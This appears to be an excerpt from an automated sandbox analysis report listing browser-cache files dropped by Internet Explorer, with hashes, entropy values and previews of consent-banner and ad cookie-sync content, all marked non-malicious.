                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):17033
                                                                                                                                                                                                                              Entropy (8bit):7.94429179620019
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NVO6pyWhfl83GcC7xW+xUKp8NL0y5pFBNJ+DD4CM:NRImaEWcp8NL0y5pFnJIDVM
                                                                                                                                                                                                                              MD5:C406E5C8E50D4B7C607A703682F00AEF
                                                                                                                                                                                                                              SHA1:79A5E6100B83552679B756D9CC9F30DEFA436D65
                                                                                                                                                                                                                              SHA-256:750DC3D45C232DD8E1127B7860F0E38E6C9A6BD3888F05615C18215179E8609C
                                                                                                                                                                                                                              SHA-512:0AF8BE812D1A05915C06EE377AD3CEB7C612A699238A3FDB07326FBDDD6E3539E8AC8FA643485383644FB67D1F284B0F52E81DCE75591D14CC5EFE950B798B32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAQXmCn[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2053
                                                                                                                                                                                                                              Entropy (8bit):7.7444838178786135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:QfAuETAChSTvvelFjDyUJRN5Hi/cqYmOJA+wUqFWnu:Qf7EA+VT2nCJfZqAu
                                                                                                                                                                                                                              MD5:BCF5C7A113C8BBAB535EDF9CCBE6490F
                                                                                                                                                                                                                              SHA1:C55BB801302CCE7ED433F2EC82F65E473EE27377
                                                                                                                                                                                                                              SHA-256:AE2DCD9205699F2D0A913DDC97A8B702E3A29555F2C1604B4A76C2BB18A8ACA8
                                                                                                                                                                                                                              SHA-512:ACE81D2D98AF4523D24607CFAF48226F1E24CF50F886C48CCEFCF1D9F65A799FF8E3F5B5ACAD3716FEAA0490CB56543406C5C95A72903D86D2900910CC32403E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\AAud6Gv[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):356
                                                                                                                                                                                                                              Entropy (8bit):7.101459310090333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmpAKG4NDBbCySVUc3/qF9Hio9hbifyZQw+bS2LblMid1Rc9ruhiFp:6v/73bCLVYHio9h8kQw+7BMW1W9rAir
                                                                                                                                                                                                                              MD5:A94D5FFB98CBCA323E6AEA6A826B9ACF
                                                                                                                                                                                                                              SHA1:D4F20C419292258A27A06511955A02400C767723
                                                                                                                                                                                                                              SHA-256:7527C0E97B871894A7AC475D714D51E82F51BB965848DCD03657B12D5808BCAB
                                                                                                                                                                                                                              SHA-512:D2B0D68C085457161F612B50508548D9FD6F7F48DE74AEC8009C65375A0CF0D58469BC8B93AC2705B4AB4A0F0D3FE07E8207500AD896FFC676D7D50649643A7D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1dTzfp[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8890
                                                                                                                                                                                                                              Entropy (8bit):7.923808661823827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QnI3wmoo/Jq+krgOtxrcnVskmB7lxED4u+I9ocY5zwX9B:0I33oo/JqqOxrcnVskQK+lpY9B
                                                                                                                                                                                                                              MD5:29792D182BA22B3E036424650829BEFE
                                                                                                                                                                                                                              SHA1:BB13279B92AD154589A1569CA7AF19474B2FD832
                                                                                                                                                                                                                              SHA-256:E6CEE354D756A03B5404D34D7F7433CA55B5D32AC5199A0A508AD3A379AABE06
                                                                                                                                                                                                                              SHA-512:F137B17A8DD6783E5906BB8000A54B5FC5769DF5878369A48B5190CFA71392FA0352A4E92EC8F91D2A28BD9C5E977A101CDF0B52FD194ADEA5AB0FA0225CEABA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1fdtSt[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):438
                                                                                                                                                                                                                              Entropy (8bit):7.245257101036661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                                                                                                                                                                                              MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                                                                                                                                                                                              SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                                                                                                                                                                                              SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                                                                                                                                                                                              SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB1ftEY0[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):497
                                                                                                                                                                                                                              Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7YEtTvpTjO7q/cW7Xt3T4kL+JxK0ew3Jw61:rEtTRTj/XtjNSJMkJw61
                                                                                                                                                                                                                              MD5:7FBE5C45678D25895F86E36149E83534
                                                                                                                                                                                                                              SHA1:173D85747B8724B1C78ABB8223542C2D741F77A9
                                                                                                                                                                                                                              SHA-256:9E32BF7E8805F283D02E5976C2894072AC37687E3C7090552529C9F8EF4DB7C6
                                                                                                                                                                                                                              SHA-512:E9DE94C6F18C3E013AB0FF1D3FF318F4111BAF2F4B6645F1E90E5433689B9AE522AE3A899975EAA0AECA14A7D042F6DF1A265BA8BC4B7F73847B585E3C12C262
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BB6Ma4a[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):368
                                                                                                                                                                                                                              Entropy (8bit):6.811857078347448
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
                                                                                                                                                                                                                              MD5:C144BE9E6D1FA9A7DB6BD090D23F3453
                                                                                                                                                                                                                              SHA1:203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
                                                                                                                                                                                                                              SHA-256:FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
                                                                                                                                                                                                                              SHA-512:67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBXXVfm[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):842
                                                                                                                                                                                                                              Entropy (8bit):7.712790381238881
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:03eeNY8QugsamcgusRa+4Sm81pdhTaXHir8L:0fNY8QuosS+4SmetsL
                                                                                                                                                                                                                              MD5:4F44C5854D2A321DE38DDA7580D99D2A
                                                                                                                                                                                                                              SHA1:637217CD4AB94060B945D364D6AD80BB173F41B7
                                                                                                                                                                                                                              SHA-256:77E9AF4EF4CEC6BAE0181D3173577BE0488DE8DB5FA71D2E5C7E05B5D5D27565
                                                                                                                                                                                                                              SHA-512:AC46863DDFE68156E7D76DDE08C299459B8C01CD8B2DB9DB5C3A4434D5CF34F6162556A29EBBCA401810ED5AD5F9BE57090E819DDED688EE7C36D179A1FBF3F6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBY7ARN[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):779
                                                                                                                                                                                                                              Entropy (8bit):7.670456272038463
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
                                                                                                                                                                                                                              MD5:30801A14BDC1842F543DA129067EA9D8
                                                                                                                                                                                                                              SHA1:1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
                                                                                                                                                                                                                              SHA-256:70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
                                                                                                                                                                                                                              SHA-512:8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\BBZbaoj[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):351
                                                                                                                                                                                                                              Entropy (8bit):6.901959384450008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmlVPGiBERRpXw0kdFA2ykO2tWNNClAukllbp:6v/7fB0RpXw0otykOhNN4kll1
                                                                                                                                                                                                                              MD5:34B5D386B790631BCF4E193D22CCD4A7
                                                                                                                                                                                                                              SHA1:E65C95C426A4430A96782CE1B9156C2DDDF8807F
                                                                                                                                                                                                                              SHA-256:6FA5E53DF07126D22CF60FA1DBCF537FE1F82F26520738317CB0086CA923AD44
                                                                                                                                                                                                                              SHA-512:D0FBCC60FCABCCF01B13735903BEE75C4843688C8208D9B7D51D47AA7B6DC6B00ACDAB83116238F8D5FC9405B96B5DFA7BD66390F8A1D8E4491BAB81D18D12F0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\checksync[1].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21717
                                                                                                                                                                                                                              Entropy (8bit):5.305602492520896
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:fuAGcVXlblcqnzleZSweg2f5ng+7naMnpuZOrQWwY4RXrqt:A86qhbS2RJpusrQWwY4RXrqt
                                                                                                                                                                                                                              MD5:677C48207F5A13E6D6DADF30D2D6C52B
                                                                                                                                                                                                                              SHA1:10BCE9871F228CA247E92B0A6366D5FE2A4426C8
                                                                                                                                                                                                                              SHA-256:16872C9C9305146F1665B47C30EAF0AF695450B80E6B659781C71E3B45526027
                                                                                                                                                                                                                              SHA-512:7C35E7BE4917DEF18676DCD367EA060F9073A093D9B66D6104784845E8B3AA3C14846F617661384E9A4F07E9FE149156A0C54DBF1030CBB4ED972CAF5F115CF8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"bs":{"name":"bs","cookie":"data-bs","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0},"ttd":{"name":"ttd","cookie":"data-ttd","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\de-ch[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):79097
                                                                                                                                                                                                                              Entropy (8bit):5.337866393801766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:olAy9XsiItnuy5zIux1whjCU7kJB1C54AYtiQzNEJEWlCgP5HVN/QZYUmftKCB:olLEJxa4CmdiuWlDxHga7B
                                                                                                                                                                                                                              MD5:408DDD452219F77E388108945DE7D0FE
                                                                                                                                                                                                                              SHA1:C34BAE1E2EBD5867CB735A5C9573E08C4787E8E7
                                                                                                                                                                                                                              SHA-256:197C124AD4B7DD42D6628B9BEFD54226CCDCD631ECFAEE6FB857195835F3B385
                                                                                                                                                                                                                              SHA-512:17B4CF649A4EAE86A6A38ABA535CAF0AEFB318D06765729053FDE4CD2EFEE7C13097286D0B8595435D0EB62EF09182A9A10CFEE2E71B72B74A6566A2697EAB1B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","cctId":"55a804ab-e5c6-4b97-9319-86263d365d28","MainText":"Ihre Privatsph.re","MainInfoText":"Wir verarbeiten Ihre Daten, um Inhalte oder Anzeigen bereitzustellen, und analysieren die Bereitstellung solcher Inhalte oder Anzeigen, um Erkenntnisse .ber unsere Website zu gewinnen. Wir geben diese Informationen auf der Grundlage einer Einwilligung und eines berechtigten Interesses an unsere Partner weiter. Sie k.nnen Ihr Recht auf Einwilligung oder Widerspruch gegen ein berechtigtes Interesse aus.ben, und zwar auf der Grundlage eines der folgenden bestimmten Zwecke oder auf Partnerebene .ber den Link unter jedem Zweck. Diese Entscheidungen werden an unsere Anbieter, die am Transparency and Consent Framework teilnehmen, signalisiert.","AboutText":"Weitere Informationen","AboutCookiesText":"Ihre Privatsph.re","ConfirmText":"Alle zulassen","AllowAll
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\iab2Data[1].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):271194
                                                                                                                                                                                                                              Entropy (8bit):5.144309124586737
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:l3JqIHQCSq23YILFMPpWje+KULpfqjI9zT:hqCSVyIeiijq
                                                                                                                                                                                                                              MD5:69E873EC1DB1AA38922F46E435785B61
                                                                                                                                                                                                                              SHA1:0E17DD5D16C19D40847AEEEC9AF898BB7F228801
                                                                                                                                                                                                                              SHA-256:D90C45999873C12E05B6A850C7C5473E1CB3DA9BD087DB5F038F56ABD65F108C
                                                                                                                                                                                                                              SHA-512:27F403FDC906C317F4023735B29ABB090867CAA41103CE2FD19E487323EBEE15884DF10A353741C218BB83C748464BE3D75459F5D086FDE983DB85FC86ADA4D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: {"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\medianet[3].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):411779
                                                                                                                                                                                                                              Entropy (8bit):5.4871296565633285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z7hkYqP1vG2jnmuynGJ8nKM03VCuPbpXEcJuzYmD:Y1vFjKnGJ8KMGxT6YmD
                                                                                                                                                                                                                              MD5:AF670B889B9B543EBEC77183AC70A006
                                                                                                                                                                                                                              SHA1:05785425B9FFD0051FA7BA32BA796A75A987B3C7
                                                                                                                                                                                                                              SHA-256:E01C5E5D99FFEE14D97AA6CCB277A118244F658DA0ED9CE718CD4391F6242125
                                                                                                                                                                                                                              SHA-512:776CC310FF36AE506C766FCDECD4DF676C5B2F18EA9077BE774656FD4AE4C08880FE70ECE44E4D60AB6E11E762AEB8B3A7D83CBAAE1440D08FEA414288B372C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\medianet[4].htm
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):411779
                                                                                                                                                                                                                              Entropy (8bit):5.48713787053686
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:z7CkYqP1vG2jnmuynGJ8nKM03VCuPbGXEcJuzYmD:j1vFjKnGJ8KMGxTvYmD
                                                                                                                                                                                                                              MD5:957EAAA9298DF60EE861591FA19C218F
                                                                                                                                                                                                                              SHA1:A1207DA877214336D58A1974B2F143462B75C41D
                                                                                                                                                                                                                              SHA-256:427264BFF78795AFC64316B20F3A4BAEB135AA192043A2DC7D95CC9421150236
                                                                                                                                                                                                                              SHA-512:61714C26AD46F375CCA4A5A02AD6428E81F499062F8E8741B7128794D77A995CEE7B761599B02BE7A22BEB971271ADA10F70D1D05346683979B4A677862D63FE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otCommonStyles[1].css
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20953
                                                                                                                                                                                                                              Entropy (8bit):5.003252373878778
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:LIsia0zYw49vRn4l7cWQjRkmSxoU/4OIZZTg8l9Qonnq3WwHpUkG4HfeXiPcB2jk:HRc7fQxNGoFBlCHcXaivSYBQY2YpuML
                                                                                                                                                                                                                              MD5:E4F88E3AF211BD9EA203D23CB0B261D5
                                                                                                                                                                                                                              SHA1:6067E95844B3E11A275ADD0B41D7AD3F00A426FD
                                                                                                                                                                                                                              SHA-256:E58322F14AC511762E2C74932104D7205440281520CF98E66F15B40AA8E60D05
                                                                                                                                                                                                                              SHA-512:B2C8870B61E9132DC7D7167F50F7C85BFE67EAC6DA711BDF0B9C85EB026249A95E8D67FFB0699934EAA304F971E44F0180E8578AFD8353943154FCE689690B76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otFlat[2].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12859
                                                                                                                                                                                                                              Entropy (8bit):5.237784426016011
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Mjuyejbn42OdP85csXfn/BoH6iAHyPtJJAk:M6ye1/m
                                                                                                                                                                                                                              MD5:0097436CBD4943F832AB9C81968CB6A0
                                                                                                                                                                                                                              SHA1:4734EF2D8D859E6BFF2E4F3F7696BA979135062C
                                                                                                                                                                                                                              SHA-256:F330D3AE039F615FF31563E4174AAE9CEAD8E99E00297146143335F65199A7A9
                                                                                                                                                                                                                              SHA-512:3CC406AE3430001B8F305FA5C3964F992BA64CE652CCABD69924FE35E69675524E77A9E288DDE9BCF697B9C1C080871076C84399CDFAD491794B8F2642008BE6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                               Preview: .. {.. "name": "otFlat",.. "html": "
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otPcCenter[2].json
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48633
                                                                                                                                                                                                                              Entropy (8bit):5.555948771441324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:VwcBWh5ZSMYib6pWXlzZz6c18tiHoQqhI:VwqZYdZz6c18tySI
                                                                                                                                                                                                                              MD5:928BD4F058C3CE1FD20BE50FE74F1CD8
                                                                                                                                                                                                                              SHA1:5CBF71DB356E50C3FFCB58E309439ED7EB1B892E
                                                                                                                                                                                                                              SHA-256:6048F2D571D6AE8F49E078A449EB84113D399DD5EA69FB5AC9C69241CD7BA945
                                                                                                                                                                                                                              SHA-512:1E165855CEF80DDFBE2129FA49A0053055561ADEFF7756DE5EA22338D0770925313CCB0993AD032B95ACE336594A5F38E9EE0F0B58ADFE1552FE9251993391C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                               Preview: .. {.. "name": "otPcCenter",.. "html": "
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\otTCF-ie[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):103536
                                                                                                                                                                                                                              Entropy (8bit):5.315961772640951
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:nq79kuJrnt6JjU7cVbkhS/G+FBlTjmSmjCRp0QRaPXJHJVhXKNTUCL29kJlXYoXY:49jht4bbkAOCRpl6TVgTUCLBX10UU/px
                                                                                                                                                                                                                              MD5:6E60674C04FFF923CE6E30A0CD4B1A04
                                                                                                                                                                                                                              SHA1:D77ED2B9FA6DD82C7A5F740777CC38858D9CBDDD
                                                                                                                                                                                                                              SHA-256:48221F1DE0F509D6C365D9F4BA1D7DB8619E01C6BC4AC8462536836E582CDC66
                                                                                                                                                                                                                              SHA-512:62F5068BDEDBA361DAD0B50B66F617A2A964B9D3DB748BF9DE29C4F6307B1891AF9A4D384F3CEB25C77B62D245F338D967084301391A41BAB9772E2632B36B96
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\tag[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10157
                                                                                                                                                                                                                              Entropy (8bit):5.433955043303664
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:4EamzdxOBoOBpxYzKhp5foeeXwhJTvlXQuzSqH3wgiKGWdrBpOIztlomlRokr:4EamR7OrxYSLQdiMoH3wgxGWdrz4+
                                                                                                                                                                                                                              MD5:DDFF3756F9EFD3A46CF3325875D813A1
                                                                                                                                                                                                                              SHA1:05D238659959B28B786CCE43E9E55A728E69428E
                                                                                                                                                                                                                              SHA-256:E80C669818773959643790269ED9448F71BD45D27D61FAFD73BC44C0F40BAACD
                                                                                                                                                                                                                              SHA-512:7E6D325A705718D0B4060BB4A2FACC538B3812B5767CBEF9F15F787C20EFB492F9E72F8F4B215A3C4D4F684236F49D80C37597E2C13F9B482C3CB441B6CA574E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1238
                                                                                                                                                                                                                              Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:HWwAaHZRRIYfOeXPmMHUKq6GGiqIlQCQ6cQflgKioUInJaqzrQJ:HWwAabuYfO8HTq0xB6XfyNoUiJaD
                                                                                                                                                                                                                              MD5:7ADA9104CCDE3FDFB92233C8D389C582
                                                                                                                                                                                                                              SHA1:4E5BA29703A7329EC3B63192DE30451272348E0D
                                                                                                                                                                                                                              SHA-256:F2945E416DDD2A188D0E64D44332F349B56C49AC13036B0B4FC946A2EBF87D99
                                                                                                                                                                                                                              SHA-512:2967FBCE4E1C6A69058FDE4C3DC2E269557F7FAD71146F3CCD6FC9085A439B7D067D5D1F8BD2C7EC9124B7E760FBC7F25F30DF21F9B3F61D1443EC3C214E3FFF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\3b2da2d4-7a38-47c3-b162-f33e769f51f5[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):57130
                                                                                                                                                                                                                              Entropy (8bit):7.972544093187763
                                                                                                                                                                                                                              Encrypted:false
